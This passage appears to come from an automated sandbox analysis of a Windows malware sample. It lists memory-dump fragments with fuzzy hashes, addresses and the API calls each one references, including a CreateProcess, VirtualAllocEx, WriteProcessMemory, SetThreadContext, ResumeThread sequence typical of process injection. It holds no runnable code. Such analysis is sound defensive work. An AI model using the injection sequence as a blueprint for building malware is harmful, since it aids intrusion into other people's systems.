                                                                            • Opcode ID: 7bf92bfa8521e58a54d99f06b6b904f5f6313a01043bc7d133bea48fe03bb7fb
                                                                            • Instruction ID: ce826fff1ab857a79cb410ae320f6aba36d9d489f33a8c71dc69443dbf4bf46f
                                                                            • Opcode Fuzzy Hash: 7bf92bfa8521e58a54d99f06b6b904f5f6313a01043bc7d133bea48fe03bb7fb
                                                                            • Instruction Fuzzy Hash: 4BA139B1D042098FDB04DFA9C586AAEFBF2BF89344F15C129E448AB346E7349946CF51
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a165b7da158ba3326c91c05d2b4bc829fb074030c5ce9e72b178b08fb45aeddf
                                                                            • Instruction ID: 29cdbc36eee088a144838f9f5dc18e24ddb2b6a1d708b7cc229d13b4380974bc
                                                                            • Opcode Fuzzy Hash: a165b7da158ba3326c91c05d2b4bc829fb074030c5ce9e72b178b08fb45aeddf
                                                                            • Instruction Fuzzy Hash: 7FA139B4D10258CFDB08DFA9D9996AEBBF2FF89300F10846AE419A7385DB345945CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C1F0
                                                                            • GetCurrentThread.KERNEL32 ref: 0106C22D
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C26A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0106C2C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: ccecd3e9a211d8b239b5ed368563f451456ca3d3fd9352d0bc7fe3c792c29036
                                                                            • Instruction ID: b118b1984ac1c9b76e03f019059b1e3db831e93e5c574f04ab28564fe1a75320
                                                                            • Opcode Fuzzy Hash: ccecd3e9a211d8b239b5ed368563f451456ca3d3fd9352d0bc7fe3c792c29036
                                                                            • Instruction Fuzzy Hash: 5C5167B0D002498FEB14CFAADA48BDEBBF4EF48314F20849AD459A7360D7786945CF61
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C1F0
                                                                            • GetCurrentThread.KERNEL32 ref: 0106C22D
                                                                            • GetCurrentProcess.KERNEL32 ref: 0106C26A
                                                                            • GetCurrentThreadId.KERNEL32 ref: 0106C2C3
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Current$ProcessThread
                                                                            • String ID:
                                                                            • API String ID: 2063062207-0
                                                                            • Opcode ID: 8210becfd1a9eedfefb2da016753a90ddd9252294ffc5132992a4a164e646945
                                                                            • Instruction ID: d730cd920f0b2be814c724dc60aa8c89209fd4ba1e1824507f70bf9fb66961a1
                                                                            • Opcode Fuzzy Hash: 8210becfd1a9eedfefb2da016753a90ddd9252294ffc5132992a4a164e646945
                                                                            • Instruction Fuzzy Hash: BF5155B0D006498FEB14CFAADA48BDEBBF4FB48314F20845AE459A7350D774A844CF65
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m$$%m
                                                                            • API String ID: 0-1229718004
                                                                            • Opcode ID: a038929a57c8d43127030af3d0b7693583d0619cb49d10b1a3207bf0c8853f99
                                                                            • Instruction ID: 8cf9acd1264cebd466c99b2321459d26b2816391f46865c41f2eb2e37463be39
                                                                            • Opcode Fuzzy Hash: a038929a57c8d43127030af3d0b7693583d0619cb49d10b1a3207bf0c8853f99
                                                                            • Instruction Fuzzy Hash: 4801A9B07006168BD768E765D61096AB3DAAFC2258725CD7DD4068B397CF71DC03CBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 074FF01E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: CreateProcess
                                                                            • String ID:
                                                                            • API String ID: 963392458-0
                                                                            • Opcode ID: 1c3fb9c130da5db5389d549577ba9faf1669a0c591abd6deac81fec600cad857
                                                                            • Instruction ID: ef18a5e2b83045def40561242e08787aca65562af5a396f00cf05440fe09bcd7
                                                                            • Opcode Fuzzy Hash: 1c3fb9c130da5db5389d549577ba9faf1669a0c591abd6deac81fec600cad857
                                                                            • Instruction Fuzzy Hash: 8C917EB1D0022ADFDB20CFA4CD417EEBBB2BF44314F14856AE919A7290DB749985CF91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A0EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 447de2bffb509a8e7c0ff79afab8981007c7c74c3fa441c42187d9059d3a8389
                                                                            • Instruction ID: fb073cff062b7100c05cbb372f1bac857ab6d87b3219030aecdb1a1cf30cd8a8
                                                                            • Opcode Fuzzy Hash: 447de2bffb509a8e7c0ff79afab8981007c7c74c3fa441c42187d9059d3a8389
                                                                            • Instruction Fuzzy Hash: D1715970A00B058FD764DF69D54479ABBF9FF88308F10896DD48ADBA40DB35E845CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01065AE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 03295bfcdef89922f0b979b3b63a322d11742c0d1509e2afb1e40ef95e6ac60a
                                                                            • Instruction ID: 7204ee97be9c6261dc737493381225247c2bfc23d843bafddfe4b34e74701115
                                                                            • Opcode Fuzzy Hash: 03295bfcdef89922f0b979b3b63a322d11742c0d1509e2afb1e40ef95e6ac60a
                                                                            • Instruction Fuzzy Hash: 48410171C0021CCBDB24CFA9C9857DDBBB5BF48308F24846AD409BB251DB71694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • CreateActCtxA.KERNEL32(?), ref: 01065AE9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: 1d67bbeb82cbfbc981fb09640ea9ea0524f6def05117556c8ea67f02d3ab46c3
                                                                            • Instruction ID: 95fea2279e8d27bb2b7b38ac8f19f8bfbf052a51ff8ec11296acbe3e09576c00
                                                                            • Opcode Fuzzy Hash: 1d67bbeb82cbfbc981fb09640ea9ea0524f6def05117556c8ea67f02d3ab46c3
                                                                            • Instruction Fuzzy Hash: 3841F270C0061DCBDB24DFA9C984BDEBBF9BF48308F248469D409AB250DB70694ACF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: d5fecff64c8ec85440afb7f9306b6db9a8c8a67be7f6f760aee423446cea6fd1
                                                                            • Instruction ID: 0dec10c020acbc1626eaab920b2b8b46361791c632b76d59514550cf16fe5345
                                                                            • Opcode Fuzzy Hash: d5fecff64c8ec85440afb7f9306b6db9a8c8a67be7f6f760aee423446cea6fd1
                                                                            • Instruction Fuzzy Hash: A2316978A44345AFF300DF60F65E77A7BA6FB89315F10842AE9098B799DB384902CF50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 074FEB00
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessWrite
                                                                            • String ID:
                                                                            • API String ID: 3559483778-0
                                                                            • Opcode ID: 723860bed8f7ddb6cd64ad8ae9f975378fa35cbcbbdc974b68e43e5f6ed97906
                                                                            • Instruction ID: 89e0a2c1719c1525d30dee7e2f9611b55fd5f014e39a7db50c1900be19fc8302
                                                                            • Opcode Fuzzy Hash: 723860bed8f7ddb6cd64ad8ae9f975378fa35cbcbbdc974b68e43e5f6ed97906
                                                                            • Instruction Fuzzy Hash: 962128B1D003599FCB10CFA9C9857EEBBF5FF48314F14842AE919A7250D7789954CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • SetThreadContext.KERNELBASE(?,00000000), ref: 074FE7C6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ContextThread
                                                                            • String ID:
                                                                            • API String ID: 1591575202-0
                                                                            • Opcode ID: f2d7d6ddd76d059fcc6b836bfb104d39e380214e076d11af2b25964438274cb6
                                                                            • Instruction ID: a74b4730cf53b51421ae80e614cc0bb7b95139a8da1dc70d352ec5bae8f34dc3
                                                                            • Opcode Fuzzy Hash: f2d7d6ddd76d059fcc6b836bfb104d39e380214e076d11af2b25964438274cb6
                                                                            • Instruction Fuzzy Hash: CD2137B1D003098FDB10DFAAC9857EEBBF4AB48224F14842AD519A7640DB78A944CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 074FEC30
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead
                                                                            • String ID:
                                                                            • API String ID: 1726664587-0
                                                                            • Opcode ID: 25ae77e4d183c912b7d6582454aa9579db67fdbe878d5102ffd1e56801adce52
                                                                            • Instruction ID: b34567697b5b4bbe7c8fe65838f672b2755b1f0400c3e9997ef379a86228ef7a
                                                                            • Opcode Fuzzy Hash: 25ae77e4d183c912b7d6582454aa9579db67fdbe878d5102ffd1e56801adce52
                                                                            • Instruction Fuzzy Hash: 472114B1C003599FCB10DFA9C980BEEBBF5FF48324F54882AE559A7250D7789950CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: acb7d60068c99a54da8231bbddeef59f5702dc76c3231c1a667257493f1a5ca7
                                                                            • Instruction ID: 55d1a5eedf9cc04628a5d5e326432a029d1807318358f35ffbd013f9dcb25c14
                                                                            • Opcode Fuzzy Hash: acb7d60068c99a54da8231bbddeef59f5702dc76c3231c1a667257493f1a5ca7
                                                                            • Instruction Fuzzy Hash: 5221C4B5D002489FDB10CFA9D984AEEBBF8FB48324F14841AE955A7310D778A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C43F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: DuplicateHandle
                                                                            • String ID:
                                                                            • API String ID: 3793708945-0
                                                                            • Opcode ID: 44bc7ac6303e17ca2a51dcf81780705ee78489a1766e0775006d43418e6f11d9
                                                                            • Instruction ID: 0c5685baa34caecb16f62837ac00f5bdaa90e15e3251af01b7cc1c11ca021dcc
                                                                            • Opcode Fuzzy Hash: 44bc7ac6303e17ca2a51dcf81780705ee78489a1766e0775006d43418e6f11d9
                                                                            • Instruction Fuzzy Hash: 6221E3B5D002089FDB10CFA9D985BEEBBF8FB48324F14841AE955A3310D378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A169,00000800,00000000,00000000), ref: 0106A37A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 3bc3e56afbbd357c12aa8dd6e05fdd32a0068c1d8e4405a1b04985c9fa57fb9f
                                                                            • Instruction ID: edd56dfc4dce8eb2776adb6146e20890a25686ecd9733239f41c4716d7b30762
                                                                            • Opcode Fuzzy Hash: 3bc3e56afbbd357c12aa8dd6e05fdd32a0068c1d8e4405a1b04985c9fa57fb9f
                                                                            • Instruction Fuzzy Hash: 9E1117B6D00219CFDB10CF9AD584ADEFBF8EB48324F14842AD459B7600C774A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A169,00000800,00000000,00000000), ref: 0106A37A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: 4ebd977293f3db57b384de5a8a5da41e83a008ac939ae570ffd7cbea33785f2a
                                                                            • Instruction ID: 1e749099853b0a0b77d86017564f2ddcb59939f879ec40d4cac09c0493494a3c
                                                                            • Opcode Fuzzy Hash: 4ebd977293f3db57b384de5a8a5da41e83a008ac939ae570ffd7cbea33785f2a
                                                                            • Instruction Fuzzy Hash: 741103B6D00208DFDB10DF9AC944ADEFBF8EB48324F14842AE559B7600C3B5A945CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 074FE9CE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 09a76f40b162f188116398f6095b9c9ed25922e6ca70fcd00046f32bb867ece8
                                                                            • Instruction ID: 54b49719a8ef7b2a81501866fd0dd739b53e092df9f2cea379ea50eed721c2cb
                                                                            • Opcode Fuzzy Hash: 09a76f40b162f188116398f6095b9c9ed25922e6ca70fcd00046f32bb867ece8
                                                                            • Instruction Fuzzy Hash: AE1167B18002099FCB10DFA9C844BEFBBF5EF48328F14882AE515A7250CB75A950CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243296408.00000000074F0000.00000040.00000001.sdmp, Offset: 074F0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: ResumeThread
                                                                            • String ID:
                                                                            • API String ID: 947044025-0
                                                                            • Opcode ID: 40623412748adbe97492830e590f625b18bdece6dfafe4e23a61c39edbda848d
                                                                            • Instruction ID: d840bef199969060afc27d2c092fcc674a44fbaa8fa297fc8068110599604a10
                                                                            • Opcode Fuzzy Hash: 40623412748adbe97492830e590f625b18bdece6dfafe4e23a61c39edbda848d
                                                                            • Instruction Fuzzy Hash: 80113DB1D003488BDB14DFA9C9457DFFBF5AB48324F148829D515A7350CB74A944CFA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A0EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.239032087.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 2cc0a48a4ef1ae93eade526cf5aceb16c7e5ba9a86e72fb228869d6a06a803fe
                                                                            • Instruction ID: 2e904033cee3196634ed764819c760e32dd7f833cbff46fc548f97f01f3ca221
                                                                            • Opcode Fuzzy Hash: 2cc0a48a4ef1ae93eade526cf5aceb16c7e5ba9a86e72fb228869d6a06a803fe
                                                                            • Instruction Fuzzy Hash: 721102B6D002498FDB10DF9AC944BDEFBF8AB48324F14845AD859B7600D379A545CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0810184D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: c6a8af8cfb9400468a71565fbc28666ad6a829163f40b4ec3a7b23b6eb3c4c8c
                                                                            • Instruction ID: 728d58fe8a5cbd84c032b37e26e4a07fa356fd5feb02624309eee5949ed6753b
                                                                            • Opcode Fuzzy Hash: c6a8af8cfb9400468a71565fbc28666ad6a829163f40b4ec3a7b23b6eb3c4c8c
                                                                            • Instruction Fuzzy Hash: 3B1103B5C002499FDB10CF99CA85BDEBBF8FB48324F14881AD955B7640C378A554CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • PostMessageW.USER32(?,?,?,?), ref: 0810184D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243650623.0000000008100000.00000040.00000001.sdmp, Offset: 08100000, based on PE: false
                                                                            Similarity
                                                                            • API ID: MessagePost
                                                                            • String ID:
                                                                            • API String ID: 410705778-0
                                                                            • Opcode ID: 8331c5983255a724a196651132d4d4ecec6ac7267ce9418ce2342c7b73498ea5
                                                                            • Instruction ID: c25a9bd24600adf489b90151e0da8f30b26c1e0c0c908043918eb7699979d9fe
                                                                            • Opcode Fuzzy Hash: 8331c5983255a724a196651132d4d4ecec6ac7267ce9418ce2342c7b73498ea5
                                                                            • Instruction Fuzzy Hash: 1E1103B58002489FDB10CF99C985BDEBBF8FB48324F10841AD515A7600C378A954CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: 8834d8aa6952d798410a4fb2dcafb546a0fdd95679d63a9245e87423b6ed7286
                                                                            • Instruction ID: e6fac5ed8d1deef8b41817d8e65fc1ff95bc58e73c635d27324c9a8398a55ecd
                                                                            • Opcode Fuzzy Hash: 8834d8aa6952d798410a4fb2dcafb546a0fdd95679d63a9245e87423b6ed7286
                                                                            • Instruction Fuzzy Hash: C201F7B07006168BCB24D725D510A7AB3EAAFC2254B14C97ED4468B2A7CF71D802CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: 012a88d2c37921db5f15338246aa790872abf3c17ca8618e71b7fe5e02a7bff5
                                                                            • Instruction ID: 25a75cdc00b208c9625627518545890837c56455e317fa8381f16314e6cea896
                                                                            • Opcode Fuzzy Hash: 012a88d2c37921db5f15338246aa790872abf3c17ca8618e71b7fe5e02a7bff5
                                                                            • Instruction Fuzzy Hash: F801F270305A028FCB24DB68D514E2677E9FF86354B15C8BED1098B226CF72EC02CB91
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $%m
                                                                            • API String ID: 0-111698852
                                                                            • Opcode ID: b7c8d1ef88e8f1bf9b941a03dbd3b809a26514ca91cd2a5527736ae3bbae38f8
                                                                            • Instruction ID: 78ddfab06eb6f57131185b0c42b3e72206d3724f8a7d416bfa8ec54db943173a
                                                                            • Opcode Fuzzy Hash: b7c8d1ef88e8f1bf9b941a03dbd3b809a26514ca91cd2a5527736ae3bbae38f8
                                                                            • Instruction Fuzzy Hash: A301AD703006028FC728DB59C514D26B3EAFF86254B11C8BAD50A8B226CF71EC02CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            • Opcode Fuzzy Hash: b9074e8269ddc0ee9e9e5c24a7e1c535577e3eb153326672ee72451a870e4084
                                                                            • Instruction Fuzzy Hash: B13107B4E10219CFDB60DFA8D989BADBBB1FF49344F044499E209AB385CB755984CF11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2b67c08b1c1f47c3647fe879ce5758db48d9983251b09f0416f9d7bf16badc9
                                                                            • Instruction ID: e06375288a425bcd48411f48adfc3b61ee8183073399fee7e1e3169185612b78
                                                                            • Opcode Fuzzy Hash: a2b67c08b1c1f47c3647fe879ce5758db48d9983251b09f0416f9d7bf16badc9
                                                                            • Instruction Fuzzy Hash: 852139B0D15249DFCB08DFA9D8856BEBBF5BB4A340F10D469D458E7252DB349A41CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed189aefdc086a8e6b52b09d0c690cb63f0fa0454ae1b9e7ccb1116fb6072c66
                                                                            • Instruction ID: 0b12a634c90c01999d67fa1456d42341feacd3fe58765b8007ccf1029dce822b
                                                                            • Opcode Fuzzy Hash: ed189aefdc086a8e6b52b09d0c690cb63f0fa0454ae1b9e7ccb1116fb6072c66
                                                                            • Instruction Fuzzy Hash: 29219FB0310A058FCB68DB38C414A6A73EAEF86754B6488ADD506CB372CF71DC02CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1003fafa086aab800aecd83a57f09b240b545876c259963c7622835aedff5523
                                                                            • Instruction ID: 6d92aadb76610a2b34cc27d436ac07c39785d1817c65ed104f003516b34d4b0a
                                                                            • Opcode Fuzzy Hash: 1003fafa086aab800aecd83a57f09b240b545876c259963c7622835aedff5523
                                                                            • Instruction Fuzzy Hash: FA21DEB13002119FDB20DE19D584EAB73AAFB84760F11882EEA4A87753CB35FC41CB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: fb31da3032a65fbdc4d17dbc6b3ad63588c0cea9cc621a2a897f63807bb38560
                                                                            • Instruction ID: 4b3730ee5c174344e3437323cc68d5f007dd142e668a3fff1c400fbb9d0f61b1
                                                                            • Opcode Fuzzy Hash: fb31da3032a65fbdc4d17dbc6b3ad63588c0cea9cc621a2a897f63807bb38560
                                                                            • Instruction Fuzzy Hash: BB2193B4310A158FC764DB39C454A6A73EAEF8665476188BDD506CB375CF71DC02CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 52c468ebd40cb7c0b8ee2f3c47265ff2d55cd89056400691cd616f55dccc69e2
                                                                            • Instruction ID: 5a9723b3fa7cdc20e1fe213634aeef7ac9dbdfe166b3c3fe12a64ba0582ce4b2
                                                                            • Opcode Fuzzy Hash: 52c468ebd40cb7c0b8ee2f3c47265ff2d55cd89056400691cd616f55dccc69e2
                                                                            • Instruction Fuzzy Hash: 1421F3B0D1524ADFCB08DFA9D4856BEBBF5BB4A380F109469D418E7242EB349A40CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd82908027e342222be7ad6170a4f5317a5a554a399e1a3d57c001b32e62dcab
                                                                            • Instruction ID: c1fb204b946ca2f29c4a48a0b8eb037f950262cdceb04beb8042db0037705092
                                                                            • Opcode Fuzzy Hash: cd82908027e342222be7ad6170a4f5317a5a554a399e1a3d57c001b32e62dcab
                                                                            • Instruction Fuzzy Hash: 21313AB4A10219CFDB10EF64DA49A9DBBF5FF08345F1488A9E415EB295DB709940CF24
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c487a4b0e558b29b9cfdd5711dff87398ace4054583caab6ecb5042058ca9e1f
                                                                            • Instruction ID: 9e49d913f407a701f9c1f02c7223490e83167b12a39ae1329f61437a36b579cd
                                                                            • Opcode Fuzzy Hash: c487a4b0e558b29b9cfdd5711dff87398ace4054583caab6ecb5042058ca9e1f
                                                                            • Instruction Fuzzy Hash: D531F2B1D01218DFDB20CFA9D9857CEBFF4AB08754F24851AE404BB241C7B95986CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c194cca0d5f9f9d9856339a458cc2439cc1bed0abfb7739de0ab61be9a0f7a7b
                                                                            • Instruction ID: 913f83310808e9bc193427682930b8e807cadddf98de32afaa25fb0b2fafacdb
                                                                            • Opcode Fuzzy Hash: c194cca0d5f9f9d9856339a458cc2439cc1bed0abfb7739de0ab61be9a0f7a7b
                                                                            • Instruction Fuzzy Hash: BA31CEB0D01218DFDB20CF99C988BDEBFF4AB08754F24846AE404BB251C7B95985CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.243423195.0000000007730000.00000040.00000001.sdmp, Offset: 07730000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ccc982258a3712ad7d14ca743fe98cce8a85987da0a27155eed67baa5d8e986c
                                                                            • Instruction ID: 1dfb1bcf6aa6136a91c4a21ea0bbdffd892941eeca2e5f88811ae841c443ffca
                                                                            • Opcode Fuzzy Hash: ccc982258a3712ad7d14ca743fe98cce8a85987da0a27155eed67baa5d8e986c
                                                                            • Instruction Fuzzy Hash: 8621ACB13006119FDB20CF19C584BAA73FAFB84720F01881EEA4A87763C634FC418B60
